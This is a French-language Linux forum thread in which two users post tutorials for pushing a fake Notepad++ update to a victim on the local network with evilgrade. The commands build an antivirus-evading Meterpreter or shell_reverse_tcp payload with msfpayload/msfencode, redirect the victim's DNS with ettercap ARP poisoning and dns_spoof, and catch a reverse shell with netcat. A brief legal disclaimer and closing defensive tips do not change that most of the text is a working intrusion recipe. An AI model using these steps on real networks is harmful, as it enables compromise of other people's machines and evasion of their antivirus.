user@linuxtrack:~ $ python -c 'print("Soyez les bienvenus !")'

Vous n'êtes pas identifié(e).

#1 20-02-2013 23:55:45

boost
Membre

evilgrade notepad++ av pwn!

Ceci est un article que j'avais rédiger sur un autre fofo.

J'ai trouvé un moyen de mettre un payload encoder pour bypass certain antivirus je m'explique.
Rendez-vous dans le répertoire du framework3 et créer votre payload comme ceci.

./msfayload windows/meterpreter/reverse_tcp LHOST=votreip LPORT=votreport R | ./msfencode -t exe -e x86/shikata_ga_nai -c 5 -o /root/Desktop/a.exe

mettre le payload sur votre bureau et rendez le exécutable.
Maintenant ouvrez evilgrade et faites:

config notepadplus
set agent /root/Desktop/a.exe

utiliser netcat ou metsploit pour mettre votre server en écoutes.
modifier le fichier etter.dns comme il se doit
lancer ettercap, scan des hosts, arp mitm sur l'ip victime, et activer le plugin dns spoof.

entrer la cmd start dans evilgrade.

mettez vous sur votre bureau windows avec av si vous voulez et faites la mises à jour de notepad++
hooo yikes
windows pwn!


boost ===>>> « Un langage de programmation est une convention pour donner des ordres à un ordinateur. Ce n’est pas censé être obscur, bizarre et plein de pièges subtils. Ca, ce sont les caractéristiques de la magie. » - Dave Small

Hors ligne

#2 21-02-2013 07:14:08

IceF0x
#! Gourou Linux

Re : evilgrade notepad++ av pwn!

Ce qui me rappelle un tuto que j'avais post sur l'ancien forum, bien que je trouve le tuto limite pour un forum généraliste, donc je rappelle que null n'est sensé ignorer la loi et que les tutos ne sont là qu'a des fin de test et d'apprentissage.

==Description==

Evilgrade est une structure modulaire qui permet à l'utilisateur de profiter des implémentations de mise à niveau en injectant de fausses mises à jour. Il est livré avec des agents pré-fait en binaires, une configuration de travail par défaut pour les pentests rapides, et possède ses propre serveur et modules DNSServer. Facile à mettre en place avec de nouveaux paramètres.

==Prérequis==

Ettercap

apt-get install ettercap

==Installation==

:!: Evilgrade est déjà présent sur backtrack 5 R3, pour les autres distribution, faite comme ci dessous.

Téléchargez l'archive depuis le site de l'éditeur.

wget http://www.infobytesec.com/down/isr-evilgrade-2.0.0.tar.gz

Ensuite une simple extraction suffit.

tar xvfz isr-evilgrade-2.0.0.tar.gz

Pour l'utiliser, déplacez vous dans le répertoire.

cd isr-evilgrade/

Et exécutez le.

./evilgrade

==Usage==

Il suffit simplement de l’exécuter depuis son répertoire d'origine.

cd /pentest/exploits/isr-evilgrade/

Puis.

./evilgrade

capture-d-cran---...13-40-28-31a2138.png

Pour afficher l'aide tapez:

evilgrade>help

capture-d-cran---...13-41-18-31a2153.png

Pour lister les modules tapez:

evilgrade>show modules
List of modules:
===============

allmynotes
amsn
appleupdate
apptapp
apt
atube
autoit3
bbappworld
blackberry
bsplayer
ccleaner
clamwin
cpan
cygwin
dap
divxsuite
express_talk
fcleaner
filezilla
flashget
flip4mac
freerip
getjar
gom
googleanalytics
growl
isopen
istat
itunes
jet
jetphoto
linkedin
miranda
mirc
nokia
nokiasoftware
notepadplus
openoffice
opera
orbit
osx
paintnet
panda_antirootkit
photoscape
quicktime
skype
sparkle
speedbit
sunbelt
sunjava
superantispyware
teamviewer
techtracker
trillian
ubertwitter
vidbox
virtualbox
vmware
winamp
winscp
winupdate
winzip
yahoomsn
- 63 modules available.

Entrez dans le module de configuration du payload, dans notre exemple le module pour notepad++.

evilgrade>configure notepadplus

Pour afficher les options que vous pouvez définir, tapez

evilgrade(notepadplus)>show options

capture-d-cran---...14-13-15-31a23ff.png

Et créez le payload

evilgrade(notepadplus)>set agent '["/pentest/exploits/framework/msfpayload windows/shell_reverse_tcp LHOST=192.168.1.XX LPORT=1234 X > <%OUT%>/tmp/notepadplus.exe<%OUT%>"]'

Explication:

/pentest/exploits/framework3/msfpayload –> Nous allons charger le msfpayload..

windows/shell_reverse_tcp –> Nous allons utiliser le shell Windows reverse tcp chargé d'ouvrir un shell sur la cible lorsque l'opération a réussi.

LHOST –> localhost l'adresse ip de votre backtrack 5 / IP de l'attaquant.

LPORT –> sur quel port vous interragissez avec la victime lorsque le fonctionnement à réussi.

La prochaine étape est que nous devons démarrer le serveur evilgrade. Assurez-vous que votre port 80 est vide.

evilgrade(notepadplus)>start

Configurez le fichier etter.dns.

vim /usr/share/ettercap/etter.dns

Et ajoutez ceci

notepad-plus.sourceforge.net –> votre IP locale

Ensuite exécutez ettercap(ici avec l'option graphique -G).

ettercap -G

ou en terminal avec l'option -C

ettercap -C

Clicquez sur Sniff –> Unified sniffing –> choisissez votre interface réseau, en général eth0.

capture-d-cran---...14-19-33-31a24d9.pngcapture-d-cran---...14-59-15-31a29eb.png

capture-d-cran---...14-21-18-31a24f6.png
capture-d-cran---...14-59-42-31a29f5.png

La prochaine étape nous avons besoin pour permettre le dns_spoof plugin ce plugin est utilisé pour rediriger la demande de la victime à Evilgrade serveur. Cliquez sur Plugins –> Manage the plugins –> Double click sur dns_spoof

capture-d-cran---...14-25-36-31a25b0.png
capture-d-cran---...15-01-26-31a29fd.png
capture-d-cran---...15-00-47-31a2a0a.png

L'étape suivante consiste a scanner les hôtes de notre réseau, cette étape sert à déterminer la cible.

capture-d-cran---...14-29-13-31a260a.pngcapture-d-cran---...15-04-39-31a2a57.png

Après avoir énuméré tous les hôtes du réseau, nous avons besoin de mettre en place la cible.

capture-d-cran---...14-32-45-31a26eb.pngcapture-d-cran---...15-05-02-31a2a5f.png

Nous avons également besoin d'effectuer une attaque "Man in the middle" pour intercepter toutes les données sur le réseau. Click Mitm –> Arp poisoning –> check "Sniff remote connection".

capture-d-cran---...14-40-01-31a276f.pngcapture-d-cran---...17-24-24-31a3a7c.png

capture-d-cran---...14-39-43-31a2772.png
capture-d-cran---...17-25-54-31a3a89.png

Après, que tout est configuré correctement exécutez start sniffing.

capture-d-cran---...14-42-36-31a27bf.pngcapture-d-cran---...17-26-34-31a3a95.png

La prochaine étape, nous allons utiliser NetCat pour écouter sur le port 1234 que nous avons déjà défini avant, à la mise en place d'Evilgrade.

nc -l -v -p 1234

Explication:

-l: pour écouter sur n'importe quel connexion entrante

-v: verbose

-p: port d'écoute

Lorsque la victime ouvrira Notepad++ il aura une demande mise à jour automatiquement comme sur la photo ci-dessous.

evilgrade11-31a28c6.jpg

Voilà NetCat en train d'installer le payload sur la cible.

evilgrade12-31a28ec.jpg

==Conclusion==

Toujours télécharger la dernière version de vos application sur le site de l’éditeur et faite de même pour les mises à jours.

Avoir un anti-virus à jour.


Utiliser des logiciels propriétaires, c'est comme les plats préparés, on est incapable de dire les conservateurs qu'ils contiennent, on dira toujours que c'est bon, mais ça ne remplacera jamais le repas fait maison par sa maman.
]:D #! Crunchbang & Archlinux GNU/Linux User ]:D

Hors ligne

Pied de page des forums